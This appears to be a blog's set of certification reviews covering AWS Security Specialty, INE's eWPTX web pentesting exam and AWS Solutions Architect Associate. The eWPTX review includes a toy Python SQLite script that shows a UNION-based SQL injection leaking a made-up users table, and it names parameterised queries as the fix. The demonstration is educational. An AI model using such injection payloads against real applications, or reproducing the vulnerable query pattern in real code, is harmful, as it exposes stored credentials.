    Like many higher-level exams, this one seemed to focus quite heavily on nuances and edge cases, so don’t fall into the trap of concentrating only on the features which you’d most commonly use. I’d also be very familiar with services such as CloudFront, CloudWatch, CloudTrail and Security Hub which will certainly appear on the exam, but can also show up as part of a broader or more complex question.

    Much more annoyingly, AWS seem to have fallen into the trap of making their higher-level exam questions “harder” by producing incredibly long, overly wordy, intentionally confusing (perhaps a little bit harsh there..) questions which take forever to unpick. In actual fact (and here’s the key on the exam) much of this fluff makes very little difference to the answer to the question, but you’ll want to practise spotting the keywords and phrases being used, and mentally prepare yourself for an awful lot of reading and re-reading before you sit the real thing. Seriously, I like to study - I read a lot and I take more exams than is probably normal for a human being, but halfway through this exam I was exhausted with trying to wade through these questions!

    While studying, remember to pay attention to the relative cost of services, as well as their complexity and ease of use - a fair few of the exam questions will ask for the “most cost-effective” or “least effort” solution.

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward; all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online, as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score, or even a pass/fail, after the exam itself. There’s speculation online that the result is only withheld when you have provisionally passed - I can’t confirm if that’s 100% true, but it was in my case: I got my pass notification about 10 hours after the exam (which was quicker than last time!). I must admit I’m not a fan of this - one assumes that AWS are reviewing exam recordings for signs of cheating - but isn’t that rather the function of the Pearson Vue proctor? Either way, be ready for an additional wait after the exam itself.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review. This time round I used the feature to bookmark questions I was too tired of reading over!

    One real positive for this exam was that AWS seem to have decided to avoid questions involving double negatives, or those “select the option which does NOT” type answers, which I always find extra confusing for no real benefit. A new feature was the ability to change the colour of the exam interface - I hope this is going to apply to all Pearson Vue exams going forward as I found it quite nice to change the colours from time to time. I still finished with a massive headache, but there you go. The exam time was plenty - there’s no practical simulations, just straight multiple-choice.

    Should I get this certification?

    As a Security specialist, I wanted to get this certification, and if you work with AWS regularly it would certainly be a good thing to do! I firmly believe that getting as many people certified in security as possible is one of the best ways to improve our collective defence against all kinds of threats, and if AWS is your thing this is a good way to go. If, however, you have little background in, or knowledge of, security, I feel this would be a very difficult certification to begin with. Even if you do work with AWS regularly, but don’t have your security fundamentals down, it might pay dividends to start with something more general (like Security+) before taking on the AWS Security Specialist. For what it’s worth, I studied for about 2 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time and had a security background - I’d double that if you’re approaching it without much Security knowledge under your belt.

    Conclusion

    Studying for and taking the AWS Certified Security - Specialty certification was enjoyable and rewarding, even if the exam was a bit of a slog. The certification is a valuable and in-demand credential that demonstrates your skills in securing AWS infrastructure and services but, to be fair, it won’t make a massive contribution to your knowledge of Security outside of the AWS platform (then again, it isn’t really supposed to!).

  • Other

    Introduction

    Having completed several other certifications with eLearn Security (now INE Security) I decided to challenge myself with the most difficult certification currently on offer in the offensive security path, the eWPTX. The exam was… “fiddly” - overall definitely one of the harder certifications I’ve gone for; however, a lot of this was for all the wrong reasons. We’ll get to that shortly!

    Certification Overview

    According to INE “The eWPTX is our most advanced web application pentesting certification. The exam requires students to perform an expert-level penetration test that is then assessed by INE’s cyber security instructors. Students are expected to provide a complete report of their findings as they would in the corporate sector in order to pass.”

    By the specification, the exam tests:

    • Penetration testing processes and methodologies
    • Web application analysis and inspection
    • Advanced Reporting skills and Remediation
    • Advanced knowledge of, and the ability to bypass, basic and advanced XSS, SQLi, etc. filters
    • Advanced knowledge of different Database Management Systems
    • Ability to create custom exploits when modern tools fail

    INE offer formal training for this certification as part of their subscription service - I didn’t have access to this, but I’ve heard a lot of positive comments about the training experience. If you already have an INE subscription with access you’re in a great spot!

    In terms of structure, the eWPTX is similar to other INE Security exams - spin up your exam environment, conduct a pentest and present a commercial grade report. Meet all the listed criteria and write a professional report and you pass. For the eWPTX, there are several key “milestone” objectives which must be completed in order to pass, in addition to which you must find and report additional vulnerabilities not specifically listed in the letter of engagement.

    Study Resources

    Since I didn’t have access to the official course from INE, I used a combination of other resources to prepare around the topics which were listed for the exam, the most important ones included:

    • HackTheBox: At this point, HTB has content which can serve as training for almost any hacking exam! I spent time focusing on machines (usually with writeups to check my work) which featured typical web attacks (SQLi, SSTI, XXE, XSS, SSRF, CSRF etc.)

    • VulnHub: Much less important to me these days, since I find spinning up a box via HTB much easier - however, VulnHub boxes are still an excellent way to focus on the core attacks mentioned above

    • Portswigger Web Security Academy: From the folks who bring you Burpsuite, the Web Security Academy is well worth working through, and a great way to get more practice with Burp.

    Preparation Tips

    Without giving too much away, it’s fair to say that this exam is hard - however, it’s hard because it’s “fiddly”, not because the exploits are especially unusual or exotic. Therefore, if you have a good grasp of SQLi, SSTI, XXE, XSS, SSRF, CSRF etc. you have a good start. You will want to make use of automated tools on the exam (there are no weird restrictions à la OSCP) so do be sure to get plenty of practice with them too. Burpsuite or OWASP ZAP is a must - you’ll also want to be comfortable with common web attack tools like SQLmap and Dirbuster (or similar).
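
    If those fundamentals need a refresher, the core mechanic behind something like a UNION-based SQLi is worth internalising before you sit the exam. Here’s a deliberately toy sketch of my own (SQLite, made-up table names, nothing exam-specific) showing why string-concatenated queries are exploitable:

    ```python
    import sqlite3

    # A throwaway in-memory database with two hypothetical tables
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT)")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO products VALUES (1, 'widget')")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

    # Vulnerable pattern: attacker-controlled input concatenated into the query
    user_input = "1 UNION SELECT username, password FROM users"
    rows = conn.execute(
        f"SELECT id, name FROM products WHERE id = {user_input}"
    ).fetchall()

    # The attacker's SELECT rides along with the original one,
    # leaking the users table alongside the product data
    print(rows)
    ```

    The remediation - parameterised queries, e.g. `conn.execute("... WHERE id = ?", (value,))` - is exactly the kind of advice you’ll be writing up in the report, so it pays to have both sides of the picture clear in your head.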

    A big aspect of preparing for this one is the psychological game - I read quite a number of reviews up front and took on board that there may well be some instability in the environment, as well as some exploits which needed firing a few times to work. What I didn’t really understand was that this meant some payloads would work literally only once, then require a complete reset of the environment - this threw me on the exam, and in a few places I was only able to move forward by throwing the same exploit again and again out of sheer frustration!

    Therefore, have uppermost in your mind:

    If you think you have found a vulnerability, and it looks exploitable IT SHOULD BE. There are no “rabbit holes” on this exam, so if it’s not working, just keep resetting the environment and re-sending the exploit until it works.

    Exam Experience

    As you may have sensed, I had a few issues with the exam experience - as many others have reported elsewhere.

    Let’s begin at the beginning - the process of getting a voucher, activating the exam and downloading the letter of engagement was all fine. As with all INE Security certifications, you can start this one whenever you like via the dashboard. The dashboard also allows you to generate a VPN config file and reset, stop and start your exam environment. This all worked fine and was a nice smooth experience.

    The lab itself - not quite so smooth! During previous INE Security certifications, I have experienced varying levels of connectivity problems - specifically the VPN would seem to randomly disconnect with the target hosts becoming unreachable, often without any actual error output from OpenVPN. The eWPTX was not terrible for this - but it wasn’t great either. I experienced one or two disconnects on most days, usually just requiring a restart of the OpenVPN process, but sometimes needing a lab reset. Overall manageable enough for the context, but certainly room for improvement.

    The biggest issue then - by far - was the instability of the critical exploits needed to pass the exam. As mentioned above, the exam is structured in such a way that besides the usual work of finding and documenting vulnerabilities, you must also exploit certain paths. The major issue for this exam is that these essential exploits seem to behave erratically and inconsistently. Payloads that I confirmed to work on one try would often not work again - sometimes after an environment reset, they wouldn’t work at all. This leads to a situation where a candidate can be using exactly the right payload, but not actually getting a response - at the very least this is unfair and in my opinion, INE really need to address this. I think it’s fair to say that if I hadn’t already looked at a good number of reviews and prepared myself for a lot of issues with the “critical” exploits I would have given up!

    More broadly (and unlike other INE Security certifications) this one felt much more like a CTF than a pentest - personally that’s not my favourite “feel” to an exam - but it’s not excessive. The scenario feels contrived, but not ridiculous and there’s enough general context to make writing a sensible report more than doable. The flip side is that practising for the exam using HTB or similar CTF platforms is probably more applicable than it otherwise might be!

    Should I get this certification?

    I have always been a fan of the eLearn Security certifications - for the most part, they’re flexible, realistic and fair. The eWPTX wasn’t terrible, but it wasn’t quite up to the usual standard, and in addition, it was inconsistent and somewhat unstable. One major caveat to keep in mind is that I did not take the official training, and I wouldn’t be surprised if the official course had example payloads or a different approach to exploitation which may have worked better on the actual exam - nonetheless, a working exploit should always be a working exploit.

    If you have an INE subscription I’d say the eWPTX is a good goal to aim for - similarly, if you’re fairly confident with web exploits and have the fortitude to keep telling yourself “No, this should work!” you should be able to pass the exam. This being said, for those who have less experience, less confidence or just less patience, this might not be the best certification for you, at least in its current state.

    Conclusion

    The eWPTX is a good concept, but it’s crippled by technical issues and instability which make it borderline unfair. I wouldn’t be surprised to see INE update this certification in the near future, and I hope they do because there’s certainly a place for it in the market - right now it just needs a little love and a few updates.

  • Other

    Introduction

    After some years of working with AWS but not getting around to certifying, I recently decided to dive into AWS certification with what seems to be the most popular choice (at least for a first certification) - the AWS Certified Solutions Architect Associate. This is my quick review of the certification!

    Certification Overview

    The AWS Certified Solutions Architect – Associate certification is currently one of the most sought-after credentials for professionals who want to showcase their expertise in designing scalable and highly available AWS solutions. Although I’m often sceptical of the validity of “Best Certification” lists, this one comes up often enough that it’s certainly in demand. Per AWS, this certification “Showcases knowledge and skills in AWS technology, across a wide range of AWS services. The focus of this certification is on the design of cost and performance-optimized solutions, demonstrating a strong understanding of the AWS Well-Architected Framework” - I’d say that’s a fair description of what you’ll get out of studying for it!

    Overall the certification is essentially a sweep through the various services offered by AWS, with a focus on the Well-Architected Framework and cost optimisation. While this is definitely a step up from AWS Cloud Practitioner in terms of technical knowledge, you won’t need a deep understanding of IT infrastructure to pass this one. Knowledge at the CompTIA A+ / Net+ / Sec+ level should be enough if you’re after a rough benchmark.

    AWS states that “This exam does not require deep hands-on coding experience, although familiarity with basic programming concepts would be an advantage.” Truthfully, I’m not sure that any understanding of programming was really required here - familiarity with JSON and YAML is required for the exam, but being able to read and understand the formats was enough.
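
    To give a sense of the level involved (this is my own made-up, minimal CloudFormation-style snippet, not an exam question), “reading” JSON on the exam means no more than being able to navigate a structure like this:

    ```python
    import json

    # A minimal, hypothetical CloudFormation-style template - on the exam
    # you only need to read and navigate structures like this, not author them
    doc = """
    {
      "Resources": {
        "MyBucket": {
          "Type": "AWS::S3::Bucket",
          "Properties": { "BucketName": "my-example-bucket" }
        }
      }
    }
    """

    template = json.loads(doc)
    print(template["Resources"]["MyBucket"]["Type"])  # AWS::S3::Bucket
    ```

    The YAML equivalent expresses the same nesting with indentation instead of braces - if you can follow both, you’re covered.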

    Exam Details

    • Exam Title: AWS Certified Solutions Architect – Associate

    • Exam Code: SAA-C03

    • Exam Format: Multiple-choice and multiple-response questions

    • Duration: 130 minutes

    • Passing Score: Approximately 720 (on a scale of 100-1000)

    • Prerequisites: No formal prerequisites, but having some experience with AWS services is recommended

    • Exam Guide: AWS Certified Solutions Architect – Associate Exam Guide

    Exam Domains

    According to the specification, the AWS Solutions Architect Associate certification exam is divided into the following key domains:

    • Domain 1: Design Secure Architectures (30% of scored content)
    • Domain 2: Design Resilient Architectures (26% of scored content)
    • Domain 3: Design High-Performing Architectures (24% of scored content)
    • Domain 4: Design Cost-Optimized Architectures (20% of scored content)

    Overall I felt that this was an accurate representation of the actual question split on the exam, if anything cost optimisation featured a little more heavily than what felt like 20%.

    Study Resources

    Unlike many vendors (mentioning no names) AWS do provide a good variety of resources to help you study for the exam - on top of this there are some excellent third-party providers offering some affordable and enjoyable training. Some key items to check out include:

    • AWS Official Documentation: I find reading through lots of documentation a bit challenging, but AWS’s training materials do a good job of signposting the most relevant ones to focus on. AWS offers extensive documentation on each service, architecture best practices, and whitepapers - I’d focus on the core documentation for the exam.
    • AWS Skill Builder: AWS provides a variety of useful resources, reasonably priced at $29 USD + tax per month - I’d recommend this for at least a single month.
    • Free Official Practice Questions: AWS offer a free official practice exam (link below) - worth a look.
    • Official Practice Exam - Available as part of the skill builder subscription, I found this to be quite representative of the actual exam - better than most practice exams.
    • Online Courses: Outside of AWS official resources there are plenty of courses available from platforms like Udemy, or subscription platforms like ITProTV or CBT Nuggets. Not on either of these platforms but well worth your time are the courses from Adrian Cantrill.
    • Labs: One of the best things about practising for an AWS exam was that labbing was very easy to do - simply create an AWS account and try things out. You can test out 99% of the services on the exam for free as part of the free tier.

    You can find the complete list of official resources from Amazon here.

    Preparation Tips

    Being able to compare and contrast different AWS services is key for success here - therefore while you’ll want to get some hands-on time with the services (not least because this is the fun part), spending some time making lists and tables which allow you to memorise the key selling points for each service is also a valuable use of time. Many of the harder questions on the exam did require you to choose between two viable options within AWS, so understanding which products are cheaper, faster, more user friendly or come with better resiliency will help greatly here.

    As always, it’s a multiple-choice exam, so ensure that you’re doing plenty of practice with exam-style questions in the run-up to the test - being a wizard on the AWS platform won’t be enough to pass if you can’t work through the questions in the allotted time!

    Exam Experience

    Exam booking is through AWS’s Certmetrics platform and was straightforward; all exams are now delivered by Pearson Vue (PSI was previously an option but no longer) and can be taken online or at a test centre. I took mine online, as is my preference. Nothing unusual or interesting to report in this regard, other than the fact that you are not shown your score, or even a pass/fail, after the exam itself. I had to wait just over 24 hours for an email confirming I’d passed.

    The exam itself was fairly straightforward - as with most (but not all) exams on the Pearson Vue platform you can go back and forward through the questions and bookmark any tough ones for review. There were no especially hard or “unfair” feeling questions - certainly a few tricky ones but nothing way out of left field. I finished the exam with plenty of time remaining and didn’t feel any more rushed than the usual exam stress leaves you feeling!

    Should I get this certification?

    Overall I found the certification to be enjoyable and accessible, and I think most people would have this experience. Personally, I found this a great way to formalise my knowledge of AWS and to explore services which I wouldn’t normally use. What would vary based on your background might be time to complete. I studied for about 3 months on and off and around work - I’m sure you could work through the material much more quickly if you were able to commit to studying full-time.

    If you have other cloud certifications this will be an exercise in learning how things are done on AWS, and if you’ve been using AWS for some time but don’t have a certification, it will be an exercise in exploring many of those services you’ve never looked at - neither of these would take especially long in my opinion, and if either of these describes you I think you’ll enjoy the certification.

    Those with a tech background but little to no experience in cloud computing may want to start with the Cloud Practitioner exam first - this is an easier introduction to the subject (and passing it will award you a 50% discount coupon for SAA, so you don’t lose out much financially). Failing that, getting familiar with the way that cloud “works” will take a bit of study and some lab time to get comfortable with some concepts, however, you’re unlikely to encounter anything especially mind-bending studying for the SAA, it’s more a case of translating your on-prem knowledge to a cloud model.

    If you’re just getting into the technology field, however, I’d strongly recommend the Cloud Practitioner exam first - this exam (and the free material available from AWS) is written very much for those just getting started - this would be the best place to start!

    It’s also worth mentioning that the three AWS Associate level exams (Architect, DevOps and SysOps) share a lot of common content - if you’re planning to take more than one, I’d recommend starting with the SAA; the high-level view it gives you is great framing for the other certs too.

    Conclusion

    Studying for and taking the AWS Certified Solutions Architect Associate certification was enjoyable and rewarding - the cert itself is a valuable and in-demand credential that demonstrates your skills in designing and implementing AWS architectures. Next up, I’ll look to take the AWS Security Specialism exam, which aligns more closely with my main interests and areas of work, but I’d agree with the many reviews and recommendations online that say SAA is an excellent starting point for getting your foot in the door with AWS.